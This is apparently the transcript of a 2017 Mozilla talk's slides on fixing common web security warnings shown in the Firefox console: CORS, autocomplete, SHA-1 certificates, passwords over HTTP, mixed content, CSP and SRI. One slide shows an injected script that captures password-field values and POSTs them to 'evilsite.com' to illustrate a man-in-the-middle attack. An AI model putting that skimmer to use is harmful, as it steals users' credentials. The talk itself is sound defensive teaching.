Upgrade to Pro — share decks privately, control downloads, hide ads and more …

"Top" 5 Security Errors We See From Firefox and...

luke crouch
January 25, 2017

"Top" 5 Security Errors We See From Firefox and How to Fix Them

The most common security errors & warnings that developers see in the Firefox console are not that hard to fix. This talk covers what they are, why they are dangerous, and how to fix them.

luke crouch

January 25, 2017
Tweet

More Decks by luke crouch

Other Decks in Technology

Transcript

  1. Fixing the Top 5 Web Security Errors We see from

    Firefox Luke Crouch • Privacy + Security Engineer, Mozilla • @groovecoder
  2. Me. I’m Luke Crouch. I work on Privacy & Security.

    I click thru slides really fast. Twitter: @groovecoder 2
  3. The “Top 5”* 3 * MDN Google Analytics: Pageviews in

    /en-US/docs/Web/Security from utm_medium=firefox-console-errors
  4. Cross-Origin Request Threats 8 Attacker •Any Malicious Origin • Phishing

    & Malware Sites • Compromised CDNs • Untrusted First Parties Attacks •Steal data from other origins
  5. HTTP Access Control (CORS) 12 http://public.slidesharecdn.com/data.json … Access-Control-Allow-Origin: www.slideshare.net …

    http://www.slideshare.net <html> … <script> new XMLHttpRequest().open( “GET”, “public.slidesharecdn.com/data.json” ); </script> … </html> https://developer.mozilla.org/en-US/docs/Web/HTTP/Access_control_CORS
  6. Form autocompletion 17 <form method=“post” action=“/updatePII”> <input type=“text” name=“ssn” >

    … </form> <form method=“post” action=“/form”> <input type=“text” name=“cc”> … </form> https://developer.mozilla.org/en-US/docs/Web/Security/Securing_your_site/Turning_off_form_autocompletion
  7. Disabling for sensitive information 19 <form method=“post” action=“/updatePII” autocomplete=“off”> <input

    type=“text” name=“ssn” > … </form> <form method=“post” action=“/form”> <input type=“text” name=“cc” autocomplete=“off”> … </form> Disable for the entire form Disable for 1 field* https://developer.mozilla.org/en-US/docs/Web/Security/Securing_your_site/Turning_off_form_autocompletion
  8. Caveat: login fields ; browsers want to remember this 20

    <form method=“post” action=“/form”> <input type=“text” name=“username” autocomplete=“off”> <input type=“password” name=“password” autocomplete=“off”> … </form> Has no effect; browser still offers to remember https://developer.mozilla.org/en-US/docs/Web/Security/Securing_your_site/Turning_off_form_autocompletion
  9. Weak Signature Algorithms Threats 23 Attacker •Malicious host •(with redirect

    or MITM vector) Attacks •Collision: Fraudulent certificates •2008 - md5: RapidSSL, Microsoft •2015 - SHA-1: “The SHAppening”
  10. Weak Signature Algorithms 24 $ openssl req -new -newkey rsa:2048

    -nodes -sha1 \ -out thecustomizewindows.com.csr \ -keyout thecustomizewindows.com.key $ openssl req -in thecustomizewindows.com.csr -noout -text Certificate Request: … Signature Algorithm: sha1WithRSAEncryption
  11. Insecure passwords 32 http://www.espn.com <html> <script> // Injected via HTTP

    MitM […document.querySelectorAll(“[type=‘password’]”)].forEach(pwInput=>{ pwInput.addEventListener(“change”, ()=> { fetch(“evilsite.com”, {method: “POST”, body: pwInput.value}); }); }); </script> … <form action=“https://www.espn.com/login" <input type=“password” /> … </html> SEE, TOLD YOU SO!
  12. Insecure password transmission Threats 33 Attacker •Man-in-the-middle: • Open WiFi

    • ISP • Proxies Attacks •Steal password ๏+ Password reuse
  13. Insecure active content 37 <script>, <link>, <iframe>, <object>, XMLHttpRequest, @font-face,

    cursor, background-image, etc. https://www.dailymotion.com/us <html> … <script src=“http://mc.dailymotion.com/masscast/2/dailymotion.us/ home/76127265087”> </script> … </html>
  14. Insecure active content Threats 38 Attacker • Man-in-the-middle: • Open

    WiFi • ISP • Proxies Attacks • Steal credentials • Steal sensitive data from DOM • Alter behavior of DOM • Install malware
  15. Insecure passive/display content 42 <img>, <audio>, <video>, <object> https://www.booking.com/ <html>

    … <img src=“http://tags.w55c.net/rs? id=c332832256414794bb465731a031be55& t=homepage” /> … </html>
  16. Insecure passive/display content Threats 43 Attacker •Man-in-the-middle: • Open WiFi

    • ISP • Proxies Attacks •Break page •Snoop content •Inject Misleading content
  17. +

  18. certbot + Let’s Encrypt 59 brew install certbot sudo certbot

    certonly --manual —preferred-challenges dns
  19. certbot + Let’s Encrypt 61 Please deploy a DNS TXT

    record under the name _acme-challenge.www.codesy.io with the following value: CxYdvM…5WvXR0 Once this is deployed, Press ENTER to continue
  20. certbot + Let’s Encrypt 63 Please deploy a DNS TXT

    record under the name _acme-challenge.www.codesy.io with the following value: CxYdvM…5WvXR0 Once this is deployed, Press ENTER to continue
  21. Content-Security-Policy-Report-Only 75 Content-Security-Policy-Report-Only: default-src https:; block-all-mixed-content; report-uri https://groovecoder.report-uri.io/r/default/csp/ reportOnly Do

    not enforce; only report violations https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy-Report-Only
  22. Subresource Integrity (SRI) 80 https://example.com <html> … <script src=“http://examplecdn.com/framework.js” crossorigin=“anonymous”

    integrity=“sha512-oqVuAfXRKap7fdgc…”> </script> … https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity Hash Algorithm Hash Digest
  23. +